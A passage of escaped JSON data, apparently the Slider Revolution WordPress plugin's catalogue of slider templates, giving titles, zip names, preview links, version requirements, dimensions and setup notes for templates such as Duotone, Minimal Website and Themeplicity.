Effect\",\"alias\":\"focusparallax\",\"zip\":\"focusparallax.zip\",\"uid\":\"13bd15fb3ddf8b9841cb55b89389cc73\",\"img\":\"focusparallax\\/slide1.jpg\",\"preview\":\" https:\\/\\/revolution.themepunch.com\\/parallax-effect-wordpress-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=parallax-effect-wordpress-plugin\",\"version\":\"1.0.0\",\"required\":\"5.2.5.3\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with mouse controlled parallax effects. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used for links on layers.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"88\":{\"id\":\"98\",\"title\":\"Duotone Slider\",\"alias\":\"duotone\",\"zip\":\"duotone.zip\",\"uid\":\"494862ceb6cb7c6658ad7cd36848cccd\",\"img\":\"duotone\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-header-image-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-header-image-slider\",\"version\":\"1.0.0\",\"required\":\"5.2.5.4\",\"width\":\"1200\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with unique parallax scroll effect. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used for links on layers.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"89\":{\"id\":\"99\",\"title\":\"Minimal Menu\",\"alias\":\"r_menu\",\"zip\":\"packs\\/r_menu.zip\",\"uid\":\"30d6a6895db1a5f29b1679061551c9f0\",\"img\":\"r_menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.1\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"110\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"90\":{\"id\":\"100\",\"title\":\"Minimal Hero\",\"alias\":\"rhero\",\"zip\":\"packs\\/r_hero.zip\",\"uid\":\"b8b46186956f6e66ad0c08e4532bbbde\",\"img\":\"r_hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"700\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"91\":{\"id\":\"101\",\"title\":\"Minimal About\",\"alias\":\"r_about\",\"zip\":\"packs\\/r_about.zip\",\"uid\":\"343010c4b4c03f92888c3e9e95bc2bb1\",\"img\":\"r_about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"92\":{\"id\":\"102\",\"title\":\"Minimal Products\",\"alias\":\"r_products\",\"zip\":\"packs\\/r_products.zip\",\"uid\":\"dda93e85c6a4456d132040147f087f39\",\"img\":\"r_products\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"1100\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"93\":{\"id\":\"103\",\"title\":\"Minimal Info\",\"alias\":\"r_info\",\"zip\":\"packs\\/r_info.zip\",\"uid\":\"d6e368e8fd4862174af6c980389ae530\",\"img\":\"r_info\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"94\":{\"id\":\"104\",\"title\":\"Inspiration Header\",\"alias\":\"inspirationheader\",\"zip\":\"inspirationheader.zip\",\"uid\":\"69f04b2be0b618fa7e184af83b86b7e7\",\"img\":\"inspirationheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme-header\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This full-screen hero slider features sequentially animated texts and cool parallax elements.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"95\":{\"id\":\"105\",\"title\":\"Magazine Slider\",\"alias\":\"magazineposts\",\"zip\":\"magazineposts.zip\",\"uid\":\"c562f3457e4edbd030959f7c5e6e0f7c\",\"img\":\"magazineposts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-magazine-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-magazine-slider\",\"version\":\"1.0.1\",\"required\":\"5.2.6\",\"width\":\"1400\",\"height\":\"1000\",\"description\":\"<span class=\\\"ttm_content\\\">A full-width slider with a mouse-controlled 3D-Parallax effect. Enjoy! <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used for links on layers.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"96\":{\"id\":\"106\",\"title\":\"News Header\",\"alias\":\"explorationheader\",\"zip\":\"explorationheader.zip\",\"uid\":\"8f20d5a868c90ded08b835fb9e8307d7\",\"img\":\"explorationheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-news-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-news-header\",\"version\":\"1.0.1\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider that is a perfect fit for displaying news on your websites header! Check out <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> to add links to buttons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"97\":{\"id\":\"107\",\"title\":\"Minimal Website Package\",\"alias\":\"minimal-website-package\",\"zip\":\"\",\"uid\":\"minimal-website-package\",\"img\":\"packages\\/template_group_1_1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-website-template\",\"version\":\"1.0.0\",\"required\":\"5.2.6\",\"width\":\"1240\",\"height\":\"110\",\"description\":\"<span class=\\\"ttm_content\\\">The Minimal Website Template is a one-pager website with a unique background color change effect on scrolling down.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">\\r\\nIn the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">Custom JavaScript<\\/a> section of the \\\"Minimal Menu\\\" Template you can scroll down to the color change section.<br\\/>\\r\\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-attributes\\/\\\" target=\\\"_blank\\\">Layers Attributes<\\/a> \\\".tp-colorchange\\\".<br\\/><br\\/>\\r\\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"4\",\"installed\":false},\"98\":{\"id\":\"109\",\"title\":\"Dark Content Block Package\",\"alias\":\"dark-fullsite-block-package\",\"zip\":\"\",\"uid\":\"dark-fullsite-block-package\",\"img\":\"packages\\/template_group_4.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"99\":{\"id\":\"110\",\"title\":\"Light Content Block Package\",\"alias\":\"fullsite-block-package\",\"zip\":\"\",\"uid\":\"fullsite-block-package\",\"img\":\"packages\\/template_group_3.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"1\",\"installed\":false},\"100\":{\"id\":\"111\",\"title\":\"Typewriter Effect\",\"alias\":\"typewritereffect\",\"zip\":\"typewritereffect.zip\",\"uid\":\"d6f8bae06cc4a7b158d680c01e59ddc2\",\"img\":\"typewritereffect\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-typewriter-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-typewriter-effect\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This is the example slider from the Typewriter add-on preview.<br\\/><a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used for links on buttons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This slider template requires the <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\\\" target=\\\"_blank\\\">Typewriter add-on<\\/a> to be installed. Edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"101\":{\"id\":\"112\",\"title\":\"Blend Mode Header\",\"alias\":\"blendmodeheader\",\"zip\":\"blendmodeheader.zip\",\"uid\":\"2e44e976596d757aab40ffa28086dcf9\",\"img\":\"blendmodeheader\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/blend-mode-hero-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=blend-mode-hero-header\",\"version\":\"1.0.0\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"1000\",\"description\":\"<span class=\\\"ttm_content\\\">This full-screen hero header with HMTL5 background video, utilizes the new 5.3 blend mode effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"102\":{\"id\":\"113\",\"title\":\"Themeplicity Menu\",\"alias\":\"themeplicity_menu\",\"zip\":\"packs\\/themeplicity_menu.zip\",\"uid\":\"7d5c1e75eaafa63683895a32a62f4ce0\",\"img\":\"themeplicity_menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"90\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"103\":{\"id\":\"114\",\"title\":\"Themeplicity Header\",\"alias\":\"themeplicity_header\",\"zip\":\"packs\\/themeplicity_header.zip\",\"uid\":\"907091e4d58acc7d12f802de2f280b7d\",\"img\":\"themeplicity_header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"1000\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack. <\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Themeplicity Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"5\",\"installed\":false},\"104\":{\"id\":\"115\",\"title\":\"Themeplicity Offer\",\"alias\":\"themeplicity_offer\",\"zip\":\"packs\\/themeplicity_offer.zip\",\"uid\":\"1bd8f9aa2f3e340449664c65ba17fb51\",\"img\":\"themeplicity_offer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"5.3.0\",\"width\":\"1240\",\"height\":\"330\",\"description\":\"<span 